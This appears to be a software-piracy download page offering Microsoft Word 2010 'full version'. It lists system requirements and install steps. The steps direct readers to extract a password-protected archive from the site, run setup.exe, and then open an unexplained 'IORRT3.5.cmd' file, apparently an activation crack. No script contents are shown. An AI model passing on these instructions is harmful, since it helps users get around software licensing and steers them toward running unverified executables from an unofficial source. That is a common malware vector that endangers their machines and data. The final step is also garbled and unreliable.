This article will help you download and install Microsoft Word 2010 full-featured on your PC. To install Microsoft Word 2010 on your PC, follow the steps and download link.
Table of contents
- About the software
- Microsoft Word 2010 System Requirements
- How to download and install Microsoft Word 2010
- Required files
About the software
Microsoft Word 2010 was included in Office 2010 as an essential program. Word 2010 features more customization in the Ribbon and a Backstage View for file management. It also allows you to create and embed screenshots. Word Web App is integrated with Word 2010.
Microsoft Word 2010 System Requirements
The minimum system requirements for Office 2010 include: Intel Pentium III processor, 500 MHz; 256 MB PC100 SDRAM; and Windows XP Professional with Service Pack 3. Office 2003 required a processor with 233 MHz and 128MB of RAM.
How To Download and Install Microsoft Word 2010
- You can click the download buttons below to finish downloading all the files. This might take from a few minutes to a few hours, depending on your download speed.
- Extract the downloaded files. For more information on extracting, please refer to this article. The password to extract will always be: www.mysoftwarefree.com
- Run setup.exe to install Microsoft Word 2010
- The full version 2010 of Microsoft Word is now installed on your system.
- To install, first download this file. Next, open “IORRT3.5.cmd” by clicking the link. Start the program again.